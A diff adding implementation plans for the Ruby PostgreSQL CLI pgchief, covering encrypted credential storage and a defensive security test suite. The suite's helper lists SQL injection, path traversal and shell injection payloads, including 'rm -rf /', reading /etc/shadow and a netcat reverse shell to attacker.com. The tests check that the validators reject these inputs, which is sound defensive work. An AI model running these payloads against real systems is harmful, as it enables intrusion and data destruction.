+**Files:**
+- Modify: `lib/pgchief/cli.rb`
+
+**Step 1: Read current CLI implementation**
+
+Run: `cat lib/pgchief/cli.rb`
+
+**Step 2: Add list-connections subcommand**
+
+Modify `lib/pgchief/cli.rb` to add a new command option:
+
+```ruby
+# Add to the option definitions
+option :list_connections do
+  short '-lc'
+  long '--list-connections'
+  desc 'List all stored connection strings'
+end
+```
+
+**Step 3: Add handler in run method**
+
+Find the run method and add:
+
+```ruby
+# In the run method, add:
+if params[:list_connections]
+  Pgchief::Command::ListConnections.new.list!
+  return
+end
+```
+
+**Step 4: Test manually**
+
+Run: `bundle exec exe/pgchief --list-connections`
+Expected: Shows "No stored connections" or lists connections
+
+**Step 5: Commit**
+
+```bash
+git add lib/pgchief/cli.rb
+git commit -m "feat: add --list-connections CLI flag
+
+- Add -lc/--list-connections flag to CLI
+- Integrate ListConnections command"
+```
+
+---
+
+## Task 10: Add Migration Tool for Old Credentials
+
+**Files:**
+- Create: `lib/pgchief/command/migrate_credentials.rb`
+- Create: `spec/pgchief/command/migrate_credentials_spec.rb`
+
+**Step 1: Write failing tests**
+
+Create `spec/pgchief/command/migrate_credentials_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/migrate_credentials'
+require 'tmpdir'
+require 'fileutils'
+
+RSpec.describe Pgchief::Command::MigrateCredentials do
+  let(:temp_dir) { Dir.mktmpdir }
+  let(:old_credentials_file) { File.join(temp_dir, 'credentials.txt') }
+  let(:credential_store) do
+    Pgchief::CredentialStore.new(
+      backend: Pgchief::CredentialStore::EncryptedFileBackend.new(storage_dir: temp_dir)
+    )
+  end
+
+  after do
+    FileUtils.rm_rf(temp_dir)
+  end
+
+  describe '#migrate!' do
+    it 'migrates credentials from old format to new format' do
+      # Create old-format credentials file
+      old_content = <<~CREDENTIALS
+        production=postgresql://user:pass@prod.example.com/proddb
+        staging=postgresql://user:pass@staging.example.com/stagingdb
+      CREDENTIALS
+      File.write(old_credentials_file, old_content)
+
+      command = described_class.new(
+        old_file: old_credentials_file,
+        credential_store: credential_store
+      )
+
+      expect { command.migrate! }
+        .to output(/Migrated 2 credentials/).to_stdout
+
+      # Verify credentials were migrated
+      expect(credential_store.retrieve('production')).to eq('postgresql://user:pass@prod.example.com/proddb')
+      expect(credential_store.retrieve('staging')).to eq('postgresql://user:pass@staging.example.com/stagingdb')
+    end
+
+    it 'handles empty old credentials file' do
+      File.write(old_credentials_file, '')
+
+      command = described_class.new(
+        old_file: old_credentials_file,
+        credential_store: credential_store
+      )
+
+      expect { command.migrate! }
+        .to output(/No credentials to migrate/).to_stdout
+    end
+
+    it 'handles non-existent old credentials file' do
+      command = described_class.new(
+        old_file: '/nonexistent/file',
+        credential_store: credential_store
+      )
+
+      expect { command.migrate! }
+        .to output(/Old credentials file not found/).to_stdout
+    end
+
+    it 'backs up old file after migration' do
+      File.write(old_credentials_file, "test=postgresql://localhost/db\n")
+
+      command = described_class.new(
+        old_file: old_credentials_file,
+        credential_store: credential_store
+      )
+      command.migrate!
+
+      backup_file = "#{old_credentials_file}.backup"
+      expect(File.exist?(backup_file)).to be true
+    end
+  end
+end
+```
+
+**Step 2: Run tests to verify they fail**
+
+Run: `bundle exec rspec spec/pgchief/command/migrate_credentials_spec.rb -v`
+Expected: FAIL
+
+**Step 3: Implement MigrateCredentials**
+
+Create `lib/pgchief/command/migrate_credentials.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require_relative '../credential_store'
+
+module Pgchief
+  module Command
+    class MigrateCredentials
+      OLD_CREDENTIALS_FILE = File.join(Dir.home, '.pgchief', 'credentials.txt')
+
+      def initialize(old_file: OLD_CREDENTIALS_FILE, credential_store: nil)
+        @old_file = old_file
+        @credential_store = credential_store || CredentialStore.new
+      end
+
+      def migrate!
+        unless File.exist?(old_file)
+          puts 'Old credentials file not found - nothing to migrate'
+          return
+        end
+
+        credentials = parse_old_file
+        if credentials.empty?
+          puts 'No credentials to migrate'
+          return
+        end
+
+        credentials.each do |name, connection_string|
+          credential_store.store(name, connection_string)
+        end
+
+        # Backup old file
+        backup_old_file
+
+        puts "Migrated #{credentials.size} credentials to secure storage"
+        puts "Old file backed up to: #{old_file}.backup"
+      rescue StandardError => e
+        puts "Error migrating credentials: #{e.message}"
+      end
+
+      private
+
+      attr_reader :old_file, :credential_store
+
+      def parse_old_file
+        credentials = {}
+
+        File.readlines(old_file).each do |line|
+          line = line.strip
+          next if line.empty? || line.start_with?('#')
+
+          if line =~ /\A([a-z0-9_]+)=(.*)\z/i
+            name = ::Regexp.last_match(1)
+            connection_string = ::Regexp.last_match(2)
+            credentials[name] = connection_string
+          end
+        end
+
+        credentials
+      end
+
+      def backup_old_file
+        backup_path = "#{old_file}.backup"
+        FileUtils.cp(old_file, backup_path)
+        File.chmod(0o600, backup_path)
+      end
+    end
+  end
+end
+```
+
+**Step 4: Run tests to verify they pass**
+
+Run: `bundle exec rspec spec/pgchief/command/migrate_credentials_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Require the command**
+
+Modify `lib/pgchief.rb`:
+
+```ruby
+# Add with other command requires
+require_relative 'pgchief/command/migrate_credentials'
+```
+
+**Step 6: Commit**
+
+```bash
+git add lib/pgchief/command/migrate_credentials.rb spec/pgchief/command/migrate_credentials_spec.rb lib/pgchief.rb
+git commit -m "feat: add migration tool for old plain-text credentials
+
+- Parse old credentials.txt format
+- Import to secure CredentialStore
+- Backup old file after migration
+- Add comprehensive tests"
+```
+
+---
+
+## Task 11: Update Documentation
+
+**Files:**
+- Modify: `README.md`
+- Modify: `CHANGELOG.md`
+
+**Step 1: Update README with security information**
+
+Modify `README.md` - add a "Security" section:
+
+```markdown
+## Security
+
+### Credential Storage
+
+pgchief stores database connection strings securely:
+
+**System Keychain (Preferred):**
+- macOS: Keychain Access
+- Linux: GNOME Keyring / KWallet / Secret Service
+- Windows: Windows Credential Manager
+
+If the system keychain is unavailable, pgchief falls back to encrypted file storage:
+- Location: `~/.pgchief/credentials.enc`
+- Encryption: XSalsa20-Poly1305 (via libsodium)
+- Authenticated encryption prevents tampering
+- Encryption key stored in `~/.pgchief/.credentials.key` (0600 permissions)
+
+**Migrating from Old Versions:**
+
+If you have plain-text credentials from pgchief < 0.7.0:
+
+```bash
+pgchief migrate-credentials
+```
+
+This will:
+1. Import credentials to secure storage
+2. Backup old file to `credentials.txt.backup`
+3. You can safely delete the backup after verification
+
+### Input Validation
+
+All database names, usernames, and file paths are validated to prevent:
+- SQL injection attacks
+- Shell command injection
+- Path traversal attacks
+```
+
+**Step 2: Update CHANGELOG**
+
+Add to `CHANGELOG.md`:
+
+```markdown
+## [Unreleased]
+
+### Added
+- Secure credential storage using system keychain or encrypted files
+- `--list-connections` CLI flag to show stored connections
+- `migrate-credentials` command to upgrade from plain-text storage
+- libsodium-based encryption for credential files (XSalsa20-Poly1305)
+
+### Changed
+- **BREAKING**: Connection strings now stored in encrypted format or system keychain
+- Store/retrieve commands now use CredentialStore abstraction
+- Credential files now have 0600 permissions by default
+
+### Security
+- Credentials encrypted at rest (AES-256 equivalent via XSalsa20)
+- Authenticated encryption prevents tampering
+- System keychain integration when available
+- Old plain-text credentials.txt format deprecated
+
+### Dependencies
+- Added: keyring ~> 0.3 (system keychain access)
+- Added: rbnacl ~> 7.1 (encryption via libsodium)
+```
+
+**Step 3: Commit**
+
+```bash
+git add README.md CHANGELOG.md
+git commit -m "docs: update documentation for secure credential storage
+
+- Add Security section to README
+- Document encryption and keychain usage
+- Add migration instructions
+- Update CHANGELOG for Week 2"
+```
+
+---
+
+## Task 12: Run Full Test Suite
+
+**Step 1: Run all tests**
+
+Run: `bundle exec rspec --format documentation`
+Expected: All tests PASS
+
+**Step 2: Run RuboCop**
+
+Run: `bundle exec rubocop`
+Expected: No new offenses
+
+**Step 3: Manual testing - store and retrieve**
+
+```bash
+# Store a connection
+bundle exec exe/pgchief store-connection --name test --url "postgresql://user:pass@localhost/testdb"
+
+# List connections
+bundle exec exe/pgchief --list-connections
+
+# Retrieve connection
+bundle exec exe/pgchief retrieve-connection --name test
+
+# Verify encryption
+cat ~/.pgchief/credentials.enc
+# Should see encrypted data, not plain text
+```
+
+**Step 4: Manual testing - migration**
+
+```bash
+# Create old-format file
+mkdir -p ~/.pgchief
+echo "oldconn=postgresql://localhost/old" > ~/.pgchief/credentials.txt
+
+# Migrate
+bundle exec exe/pgchief migrate-credentials
+
+# Verify
+bundle exec exe/pgchief --list-connections
+# Should include 'oldconn'
+```
+
+---
+
+## Verification Checklist
+
+- [ ] Credentials stored in encrypted format or system keychain
+- [ ] No plain-text passwords in credential files
+- [ ] Credential files have 0600 permissions
+- [ ] Encryption key files have 0600 permissions
+- [ ] Migration from old format works correctly
+- [ ] List command shows all stored credentials
+- [ ] Store/retrieve commands use CredentialStore
+- [ ] Tests cover encryption, decryption, and tampering detection
+- [ ] Tests verify file permissions
+- [ ] README documents security features
+- [ ] CHANGELOG updated
+
+## Notes
+
+- The keyring gem supports macOS, Linux (GNOME/KDE), and Windows
+- libsodium must be installed as a system dependency
+- Encrypted file backend is automatic fallback when keychain unavailable
+- Each connection is stored separately (easier to manage than one encrypted blob)
+- Encryption uses authenticated encryption to detect tampering

--- a/docs/plans/2026-01-30-week3-security-test-suite.md
+++ b/docs/plans/2026-01-30-week3-security-test-suite.md
@@ -1,0 +1,1453 @@
+# Week 3: Add Comprehensive Security Test Suite Implementation Plan
+
+> **For Claude:** REQUIRED SUB-SKILL: Use superpowers:executing-plans to implement this plan task-by-task.
+
+**Goal:** Build comprehensive security test coverage including penetration tests, fuzzing, and automated security scanning to ensure all injection vulnerabilities are caught.
+
+**Architecture:** Create dedicated security test suite with categorized tests (injection, authentication, authorization, file access). Add SimpleCov for coverage tracking. Integrate Brakeman for static security analysis. Add fuzzing tests for input validation.
+
+**Tech Stack:** Ruby 3.0+, RSpec, SimpleCov, Brakeman, Faker (fuzzing data)
+
+---
+
+## Task 1: Add Testing Dependencies
+
+**Files:**
+- Modify: `pgchief.gemspec`
+- Modify: `Gemfile`
+
+**Step 1: Add gems to Gemfile (development dependencies)**
+
+Modify `Gemfile`:
+
+```ruby
+group :development, :test do
+  gem 'brakeman', '~> 6.0'     # Static security analysis
+  gem 'simplecov', '~> 0.22'   # Code coverage
+  gem 'faker', '~> 3.2'         # Generate fuzzing test data
+end
+```
+
+**Step 2: Install dependencies**
+
+Run: `bundle install`
+Expected: Gems install successfully
+
+**Step 3: Commit**
+
+```bash
+git add Gemfile Gemfile.lock
+git commit -m "deps: add security testing dependencies
+
+- Add brakeman for static security analysis
+- Add simplecov for code coverage tracking
+- Add faker for generating fuzzing test data"
+```
+
+---
+
+## Task 2: Configure SimpleCov for Coverage Tracking
+
+**Files:**
+- Create: `spec/support/simplecov.rb`
+- Modify: `spec/spec_helper.rb`
+
+**Step 1: Create SimpleCov configuration**
+
+Create `spec/support/simplecov.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'simplecov'
+
+SimpleCov.start do
+  add_filter '/spec/'
+  add_filter '/vendor/'
+
+  add_group 'Commands', 'lib/pgchief/command'
+  add_group 'Prompts', 'lib/pgchief/prompt'
+  add_group 'Core', 'lib/pgchief'
+
+  minimum_coverage 80
+  minimum_coverage_by_file 70
+
+  # Fail build if coverage drops below thresholds
+  at_exit do
+    SimpleCov.result.format!
+  end
+end
+```
+
+**Step 2: Load SimpleCov in spec_helper**
+
+Modify `spec/spec_helper.rb` - add at the very top, before other requires:
+
+```ruby
+# frozen_string_literal: true
+
+# Coverage must be loaded before application code
+require 'support/simplecov' if ENV.fetch('COVERAGE', 'true') == 'true'
+
+# ... rest of spec_helper
+```
+
+**Step 3: Test coverage tracking**
+
+Run: `COVERAGE=true bundle exec rspec`
+Expected: Tests run and generate coverage report in `coverage/`
+
+**Step 4: Add coverage directory to .gitignore**
+
+Modify `.gitignore`:
+
+```
+coverage/
+```
+
+**Step 5: Commit**
+
+```bash
+git add spec/support/simplecov.rb spec/spec_helper.rb .gitignore
+git commit -m "feat: add code coverage tracking with SimpleCov
+
+- Configure SimpleCov with 80% minimum coverage
+- Group coverage by component (Commands, Prompts, Core)
+- Generate HTML coverage reports
+- Add coverage/ to .gitignore"
+```
+
+---
+
+## Task 3: Create Security Test Suite Structure
+
+**Files:**
+- Create: `spec/security/sql_injection_spec.rb`
+- Create: `spec/security/shell_injection_spec.rb`
+- Create: `spec/security/path_traversal_spec.rb`
+- Create: `spec/security/credential_security_spec.rb`
+- Create: `spec/support/security_helper.rb`
+
+**Step 1: Create security test helper**
+
+Create `spec/support/security_helper.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+# Helper methods and data for security testing
+module SecurityHelper
+  # Common SQL injection payloads
+  SQL_INJECTION_PAYLOADS = [
+    "'; DROP TABLE users--",
+    "admin' OR '1'='1",
+    "admin'--",
+    "' OR '1'='1' /*",
+    "'; EXEC xp_cmdshell('dir')--",
+    "1' UNION SELECT NULL--",
+    "admin' AND 1=1--",
+    "' OR 'x'='x",
+    "; DROP DATABASE test--",
+    "' OR 1=1--"
+  ].freeze
+
+  # Common shell injection payloads
+  SHELL_INJECTION_PAYLOADS = [
+    "; rm -rf /",
+    "| cat /etc/passwd",
+    "& whoami",
+    "`whoami`",
+    "$(whoami)",
+    "&& ls -la",
+    "|| ls",
+    "; cat /etc/shadow",
+    "| nc attacker.com 1234 -e /bin/sh"
+  ].freeze
+
+  # Path traversal payloads
+  PATH_TRAVERSAL_PAYLOADS = [
+    "../../../etc/passwd",
+    "..\\..\\..\\windows\\system32\\config\\sam",
+    "../../.ssh/id_rsa",
+    "/etc/passwd",
+    "....//....//....//etc/passwd",
+    "..%2F..%2F..%2Fetc%2Fpasswd",
+    "..%252F..%252F..%252Fetc%252Fpasswd"
+  ].freeze
+
+  # Invalid identifier characters
+  INVALID_IDENTIFIER_CHARS = [
+    ' ', '!', '@', '#', '$', '%', '^', '&', '*', '(',
+    ')', '-', '+', '=', '{', '}', '[', ']', '|', '\\',
+    ':', ';', '"', "'", '<', '>', ',', '.', '?', '/'
+  ].freeze
+
+  def sql_injection_attempts
+    SQL_INJECTION_PAYLOADS
+  end
+
+  def shell_injection_attempts
+    SHELL_INJECTION_PAYLOADS
+  end
+
+  def path_traversal_attempts
+    PATH_TRAVERSAL_PAYLOADS
+  end
+
+  def invalid_identifier_chars
+    INVALID_IDENTIFIER_CHARS
+  end
+
+  # Generate random malicious input
+  def random_sql_injection
+    SQL_INJECTION_PAYLOADS.sample
+  end
+
+  def random_shell_injection
+    SHELL_INJECTION_PAYLOADS.sample
+  end
+
+  def random_path_traversal
+    PATH_TRAVERSAL_PAYLOADS.sample
+  end
+end
+
+RSpec.configure do |config|
+  config.include SecurityHelper, :security
+end
+```
+
+**Step 2: Create SQL injection security tests**
+
+Create `spec/security/sql_injection_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'support/security_helper'
+
+RSpec.describe 'SQL Injection Prevention', :security do
+  describe 'Database Commands' do
+    describe Pgchief::Command::DatabaseCreate do
+      it 'rejects all SQL injection attempts in database name' do
+        sql_injection_attempts.each do |payload|
+          expect { described_class.new(database: payload).create_db! }
+            .to raise_error(Pgchief::InvalidIdentifierError),
+                            "Failed to reject: #{payload.inspect}"
+        end
+      end
+
+      it 'rejects database names with invalid characters' do
+        invalid_identifier_chars.each do |char|
+          database_name = "test#{char}db"
+          expect { described_class.new(database: database_name).create_db! }
+            .to raise_error(Pgchief::InvalidIdentifierError),
+                            "Failed to reject character: #{char.inspect}"
+        end
+      end
+
+      it 'accepts only valid alphanumeric and underscore names' do
+        valid_names = ['testdb', 'test_db', 'test123', '_test', 'TEST_DB']
+        valid_names.each do |name|
+          # Should not raise during initialization
+          expect { described_class.new(database: name) }.not_to raise_error
+        end
+      end
+    end
+
+    describe Pgchief::Command::DatabaseDrop do
+      it 'rejects all SQL injection attempts' do
+        sql_injection_attempts.each do |payload|
+          expect { described_class.new(database: payload).drop_db! }
+            .to raise_error(Pgchief::InvalidIdentifierError)
+        end
+      end
+    end
+
+    describe Pgchief::Command::DatabasePrivilegesGrant do
+      it 'rejects SQL injection in database name' do
+        sql_injection_attempts.each do |payload|
+          expect do
+            described_class.new(database: payload, username: 'valid').grant_privs!
+          end.to raise_error(Pgchief::InvalidIdentifierError)
+        end
+      end
+
+      it 'rejects SQL injection in username' do
+        sql_injection_attempts.each do |payload|
+          expect do
+            described_class.new(database: 'valid', username: payload).grant_privs!
+          end.to raise_error(Pgchief::InvalidIdentifierError)
+        end
+      end
+    end
+
+    describe Pgchief::Command::DatabasePrivilegesRevoke do
+      it 'rejects SQL injection in database name' do
+        sql_injection_attempts.each do |payload|
+          expect do
+            described_class.new(database: payload, username: 'valid').revoke_privs!
+          end.to raise_error(Pgchief::InvalidIdentifierError)
+        end
+      end
+
+      it 'rejects SQL injection in username' do
+        sql_injection_attempts.each do |payload|
+          expect do
+            described_class.new(database: 'valid', username: payload).revoke_privs!
+          end.to raise_error(Pgchief::InvalidIdentifierError)
+        end
+      end
+    end
+  end
+
+  describe 'User Commands' do
+    describe Pgchief::Command::UserCreate do
+      it 'rejects all SQL injection attempts in username' do
+        sql_injection_attempts.each do |payload|
+          expect do
+            described_class.new(username: payload, password: 'valid123').create_user!
+          end.to raise_error(Pgchief::InvalidIdentifierError)
+        end
+      end
+
+      it 'validates password length and prevents SQL injection via password' do
+        # Even though passwords are parameterized, we still validate them
+        expect do
+          described_class.new(username: 'valid', password: 'a' * 101).create_user!
+        end.to raise_error(Pgchief::InvalidIdentifierError, /password/)
+      end
+
+      it 'rejects SQL injection in role parameter' do
+        sql_injection_attempts.each do |payload|
+          expect do
+            described_class.new(username: 'valid', password: 'valid123', role: payload).create_user!
+          end.to raise_error(Pgchief::InvalidIdentifierError)
+        end
+      end
+    end
+
+    describe Pgchief::Command::UserDrop do
+      it 'rejects all SQL injection attempts in username' do
+        sql_injection_attempts.each do |payload|
+          expect { described_class.new(username: payload).drop_user! }
+            .to raise_error(Pgchief::InvalidIdentifierError)
+        end
+      end
+    end
+  end
+end
+```
+
+**Step 3: Create shell injection security tests**
+
+Create `spec/security/shell_injection_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'support/security_helper'
+
+RSpec.describe 'Shell Injection Prevention', :security do
+  describe 'Backup Commands' do
+    describe Pgchief::Command::DatabaseBackup do
+      it 'rejects all shell injection attempts in database name' do
+        shell_injection_attempts.each do |payload|
+          database_name = "test#{payload}"
+          expect { described_class.new(database: database_name).backup! }
+            .to raise_error(Pgchief::InvalidIdentifierError),
+                            "Failed to reject: #{database_name.inspect}"
+        end
+      end
+
+      it 'rejects database names with backticks' do
+        expect { described_class.new(database: 'test`whoami`').backup! }
+          .to raise_error(Pgchief::InvalidIdentifierError)
+      end
+
+      it 'rejects database names with command substitution' do
+        expect { described_class.new(database: 'test$(whoami)').backup! }
+          .to raise_error(Pgchief::InvalidIdentifierError)
+      end
+
+      it 'rejects database names with shell metacharacters' do
+        shell_chars = ['&', '|', ';', '`', '$', '(', ')', '<', '>', '\n', '\r']
+        shell_chars.each do |char|
+          database_name = "test#{char}db"
+          expect { described_class.new(database: database_name).backup! }
+            .to raise_error(Pgchief::InvalidIdentifierError),
+                            "Failed to reject: #{char.inspect}"
+        end
+      end
+    end
+
+    describe Pgchief::Command::DatabaseRestore do
+      it 'rejects shell injection in database name' do
+        shell_injection_attempts.each do |payload|
+          expect do
+            described_class.new(database: "test#{payload}", location: '/tmp/test.dump').restore!
+          end.to raise_error(Pgchief::InvalidIdentifierError)
+        end
+      end
+
+      it 'rejects shell injection in file path' do
+        shell_injection_attempts.each do |payload|
+          path = "/tmp/test#{payload}.dump"
+          expect do
+            described_class.new(database: 'testdb', location: path).restore!
+          end.to raise_error(Pgchief::InvalidFilePathError),
+                             "Failed to reject path: #{path.inspect}"
+        end
+      end
+    end
+
+    describe Pgchief::Command::QuickBackup do
+      it 'rejects shell injection attempts' do
+        shell_injection_attempts.each do |payload|
+          expect { described_class.new(database: "test#{payload}").backup! }
+            .to raise_error(Pgchief::InvalidIdentifierError)
+        end
+      end
+    end
+
+    describe Pgchief::Command::QuickRestore do
+      it 'rejects shell injection in database name' do
+        expect do
+          described_class.new(database: 'test; rm -rf /', location: '/tmp/test').restore!
+        end.to raise_error(Pgchief::InvalidIdentifierError)
+      end
+
+      it 'rejects shell injection in location' do
+        expect do
+          described_class.new(database: 'test', location: 'file; whoami').restore!
+        end.to raise_error(Pgchief::InvalidFilePathError)
+        end
+      end
+    end
+  end
+end
+```
+
+**Step 4: Create path traversal security tests**
+
+Create `spec/security/path_traversal_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'support/security_helper'
+
+RSpec.describe 'Path Traversal Prevention', :security do
+  describe Pgchief::Command::DatabaseRestore do
+    it 'rejects all path traversal attempts' do
+      path_traversal_attempts.each do |payload|
+        expect do
+          described_class.new(database: 'testdb', location: payload).restore!
+        end.to raise_error(Pgchief::InvalidFilePathError),
+                           "Failed to reject: #{payload.inspect}"
+      end
+    end
+
+    it 'rejects paths containing ..' do
+      dangerous_paths = [
+        '../backup.dump',
+        'backups/../../secret.dump',
+        '/tmp/../etc/passwd'
+      ]
+
+      dangerous_paths.each do |path|
+        expect do
+          described_class.new(database: 'testdb', location: path).restore!
+        end.to raise_error(Pgchief::InvalidFilePathError)
+      end
+    end
+  end
+
+  describe Pgchief::Validators do
+    describe '.valid_file_path?' do
+      it 'rejects all path traversal payloads' do
+        path_traversal_attempts.each do |payload|
+          expect(described_class.valid_file_path?(payload)).to be false,
+                                                                       "Failed to reject: #{payload.inspect}"
+        end
+      end
+
+      it 'accepts safe absolute paths' do
+        safe_paths = [
+          '/tmp/backup.dump',
+          '/home/user/backups/db.dump',
+          '/var/lib/postgresql/backup.dump'
+        ]
+
+        safe_paths.each do |path|
+          expect(described_class.valid_file_path?(path)).to be true
+        end
+      end
+
+      it 'accepts safe relative paths without traversal' do
+        safe_paths = [
+          'backup.dump',
+          'backups/db.dump',
+          'data/backups/2024/db.dump'
+        ]
+
+        safe_paths.each do |path|
+          expect(described_class.valid_file_path?(path)).to be true
+        end
+      end
+    end
+  end
+end
+```
+
+**Step 5: Create credential security tests**
+
+Create `spec/security/credential_security_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/credential_store'
+require 'tmpdir'
+
+RSpec.describe 'Credential Security', :security do
+  let(:temp_dir) { Dir.mktmpdir }
+  let(:backend) do
+    Pgchief::CredentialStore::EncryptedFileBackend.new(storage_dir: temp_dir)
+  end
+
+  after do
+    FileUtils.rm_rf(temp_dir)
+  end
+
+  describe 'Encrypted File Backend' do
+    it 'does not store passwords in plaintext' do
+      backend.store('production', 'postgresql://admin:supersecret@localhost/proddb')
+
+      credentials_file = File.join(temp_dir, 'credentials.enc')
+      raw_content = File.read(credentials_file)
+
+      expect(raw_content).not_to include('supersecret')
+      expect(raw_content).not_to include('admin')
+      expect(raw_content).not_to include('postgresql')
+    end
+
+    it 'does not store encryption key in credentials file' do
+      backend.store('test', 'postgresql://user:pass@host/db')
+
+      credentials_file = File.join(temp_dir, 'credentials.enc')
+      key_file = File.join(temp_dir, '.credentials.key')
+
+      credentials_content = File.read(credentials_file)
+      key_content = File.read(key_file)
+
+      # Key should not appear in credentials file
+      expect(credentials_content).not_to include(key_content)
+    end
+
+    it 'uses authenticated encryption (detects tampering)' do
+      backend.store('test', 'postgresql://localhost/db')
+
+      credentials_file = File.join(temp_dir, 'credentials.enc')
+      original_content = File.read(credentials_file)
+
+      # Tamper with the file
+      tampered_content = original_content.reverse
+      File.write(credentials_file, tampered_content)
+
+      # Should raise error when trying to decrypt tampered data
+      expect { backend.retrieve('test') }.to raise_error(RbNaCl::CryptoError)
+    end
+
+    it 'sets secure file permissions (0600) on credentials file' do
+      backend.store('test', 'value')
+
+      credentials_file = File.join(temp_dir, 'credentials.enc')
+      mode = File.stat(credentials_file).mode & 0o777
+
+      expect(mode).to eq(0o600), 'Credentials file should be readable/writable only by owner'
+    end
+
+    it 'sets secure file permissions (0600) on key file' do
+      backend.store('test', 'value')
+
+      key_file = File.join(temp_dir, '.credentials.key')
+      mode = File.stat(key_file).mode & 0o777
+
+      expect(mode).to eq(0o600), 'Key file should be readable/writable only by owner'
+    end
+
+    it 'generates different ciphertext for same plaintext (random nonces)' do
+      backend.store('test1', 'same_value')
+      backend.store('test2', 'same_value')
+
+      credentials_file = File.join(temp_dir, 'credentials.enc')
+      content1 = File.read(credentials_file)
+
+      # Store again
+      backend.delete('test1')
+      backend.store('test1', 'same_value')
+
+      content2 = File.read(credentials_file)
+
+      # Files should be different due to different nonces
+      expect(content1).not_to eq(content2)
+
+      # But decryption should still work
+      expect(backend.retrieve('test1')).to eq('same_value')
+    end
+  end
+
+  describe 'Connection String Validation' do
+    describe Pgchief::Command::StoreConnectionString do
+      it 'rejects non-postgresql URLs' do
+        expect do
+          described_class.new(
+            name: 'test',
+            connection_string: 'mysql://localhost/db'
+          ).store!
+        end.to raise_error(ArgumentError, /must start with postgresql/)
+      end
+
+      it 'rejects malformed URLs' do
+        expect do
+          described_class.new(
+            name: 'test',
+            connection_string: 'not a url'
+          ).store!
+        end.to raise_error(ArgumentError, /Invalid connection string/)
+      end
+
+      it 'validates connection string name' do
+        expect do
+          described_class.new(
+            name: "test'; DROP TABLE",
+            connection_string: 'postgresql://localhost/db'
+          )
+        end.to raise_error(Pgchief::InvalidIdentifierError)
+      end
+    end
+  end
+end
+```
+
+**Step 6: Require security helper**
+
+Modify `spec/spec_helper.rb`:
+
+```ruby
+# Add with other requires
+Dir[File.join(__dir__, 'support', '**', '*.rb')].each { |f| require f }
+```
+
+**Step 7: Run security tests**
+
+Run: `bundle exec rspec spec/security --format documentation`
+Expected: Tests FAIL (security fixes not yet in place - this is Week 3, fixes are in Week 1)
+
+**Note:** These tests are designed to pass after Week 1 implementation. If running standalone, they document the security requirements.
+
+**Step 8: Commit**
+
+```bash
+git add spec/security/ spec/support/security_helper.rb spec/spec_helper.rb
+git commit -m "feat: add comprehensive security test suite
+
+- Add SQL injection prevention tests (all commands)
+- Add shell injection prevention tests (backup/restore)
+- Add path traversal prevention tests
+- Add credential security tests (encryption, permissions)
+- Create security helper with common attack payloads
+- Tests verify fixes from Week 1"
+```
+
+---
+
+## Task 4: Add Fuzzing Tests
+
+**Files:**
+- Create: `spec/security/fuzzing_spec.rb`
+
+**Step 1: Create fuzzing tests**
+
+Create `spec/security/fuzzing_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'faker'
+require 'support/security_helper'
+
+RSpec.describe 'Input Fuzzing', :security do
+  # Test with random invalid inputs
+  describe 'Database identifier fuzzing' do
+    it 'rejects random strings with special characters' do
+      100.times do
+        # Generate random string with special chars
+        invalid_name = Faker::Lorem.characters(number: rand(1..100)) +
+                       invalid_identifier_chars.sample
+
+        expect do
+          Pgchief::Command::DatabaseCreate.new(database: invalid_name).create_db!
+        end.to raise_error(Pgchief::InvalidIdentifierError),
+                           "Should reject: #{invalid_name.inspect}"
+      end
+    end
+
+    it 'accepts random valid identifiers' do
+      100.times do
+        # Generate valid identifier: letters, numbers, underscores
+        valid_name = Faker::Lorem.characters(number: rand(1..63), min_alpha: 1)
+                           .gsub(/[^a-z0-9_]/i, '_')
+                           .gsub(/^[0-9]/, '_') # Ensure starts with letter or underscore
+
+        # Should not raise during initialization
+        expect { Pgchief::Command::DatabaseCreate.new(database: valid_name) }
+          .not_to raise_error
+      end
+    end
+  end
+
+  describe 'Username fuzzing' do
+    it 'rejects random strings with special characters' do
+      50.times do
+        invalid_username = Faker::Internet.username + invalid_identifier_chars.sample
+
+        expect do
+          Pgchief::Command::UserCreate.new(
+            username: invalid_username,
+            password: 'validpass123'
+          ).create_user!
+        end.to raise_error(Pgchief::InvalidIdentifierError)
+      end
+    end
+  end
+
+  describe 'Password fuzzing' do
+    it 'accepts various valid password formats' do
+      valid_passwords = [
+        Faker::Internet.password(min_length: 8, max_length: 32),
+        Faker::Internet.password(min_length: 8, max_length: 32, mix_case: true),
+        Faker::Internet.password(min_length: 8, max_length: 32, mix_case: true, special_characters: true),
+        '!@#$%^&*()_+-={}[]|:;"<>,.?/',
+        'password with spaces',
+        "password'with'quotes",
+        'password"with"double'
+      ]
+
+      valid_passwords.each do |password|
+        expect(Pgchief::Validators.valid_password?(password)).to be true,
+                                                                         "Should accept password: #{password.inspect}"
+      end
+    end
+
+    it 'rejects passwords that are too long' do
+      long_password = Faker::Lorem.characters(number: 101)
+      expect(Pgchief::Validators.valid_password?(long_password)).to be false
+    end
+  end
+
+  describe 'File path fuzzing' do
+    it 'rejects paths with random shell metacharacters' do
+      50.times do
+        # Generate path with shell metacharacters
+        shell_chars = ['&', '|', ';', '`', '$', '(', ')']
+        dangerous_path = "/tmp/backup#{shell_chars.sample}file.dump"
+
+        expect(Pgchief::Validators.valid_file_path?(dangerous_path)).to be false,
+                                                                                 "Should reject: #{dangerous_path.inspect}"
+      end
+    end
+
+    it 'accepts various valid file path formats' do
+      valid_paths = [
+        '/tmp/backup.dump',
+        '/home/user/backups/db.dump',
+        'backup.dump',
+        'backups/2024/january/db.dump',
+        '/var/lib/postgresql/backup_20240101.dump'
+      ]
+
+      valid_paths.each do |path|
+        expect(Pgchief::Validators.valid_file_path?(path)).to be true,
+                                                                     "Should accept: #{path.inspect}"
+      end
+    end
+  end
+
+  describe 'Length limit fuzzing' do
+    it 'rejects identifiers longer than 63 characters' do
+      long_identifier = 'a' * 64
+      expect(Pgchief::Validators.valid_identifier?(long_identifier)).to be false
